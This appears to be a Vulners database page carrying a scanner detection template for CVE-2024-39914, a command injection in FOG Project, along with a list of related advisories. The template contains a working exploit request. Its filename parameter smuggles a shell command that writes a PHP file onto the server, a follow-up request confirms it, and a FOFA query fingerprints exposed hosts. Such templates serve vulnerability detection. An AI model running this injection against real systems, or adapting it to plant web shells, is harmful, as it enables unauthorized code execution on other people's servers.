| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-39914 | 12 Jul 202417:46 | – | circl | |
| FOGProject Security Breach | 12 Jul 202400:00 | – | cnnvd | |
| CVE-2024-39914 | 12 Jul 202414:46 | – | cve | |
| CVE-2024-39914 FOG has a command injection in /fog/management/export.php?filename= | 12 Jul 202414:46 | – | cvelist | |
| CVE-2024-39914 | 12 Jul 202415:15 | – | nvd | |
| CVE-2024-39914 FOG has a command injection in /fog/management/export.php?filename= | 12 Jul 202414:46 | – | osv | |
| PT-2024-28728 · Fog · Fog | 12 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-39914 | 9 Jan 202608:32 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-39914 | 5 Dec 202400:00 | – | vulncheck_kev | |
| CVE-2024-39914 FOG has a command injection in /fog/management/export.php?filename= | 12 Jul 202414:46 | – | vulnrichment |
id: CVE-2024-39914
info:
name: FOG Project < 1.5.10.34 - Remote Command Execution
author: s4e-io
severity: critical
description: |
FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.
impact: |
Unauthenticated attackers can exploit command injection to achieve remote code execution on the FOG server.
remediation: |
Update FOG Project to version 1.5.10.34 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-39914
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914
- https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
- https://blog.csdn.net/qq_39894062/article/details/140550009
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39914
cwe-id: CWE-77
epss-score: 0.23414
epss-percentile: 0.97513
metadata:
vendor: fogproject
product: fogproject
fofa-query: icon_hash="-1952619005"
tags: cve,cve2024,rce,fog,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(12))}}"
num: "{{rand_int(1000, 9999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fogguiuser=fog&nojson=2
matchers:
- type: dsl
dsl:
- 'contains_all(body,"No HTML files!","HTMLDOC")'
- 'contains(content_type, "application/pdf")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /management/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'contains(content_type, "text/html")'
- "status_code == 200"
condition: and
# digest: 4a0a0047304502203140767218f6cf841d4292c18f97b0e1cd9aaff13c5e793e86456c59b2fb7a0b022100820d66f4da75373aa88c09ce428dbab79c656388ef9edb20036f74122c1c308c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation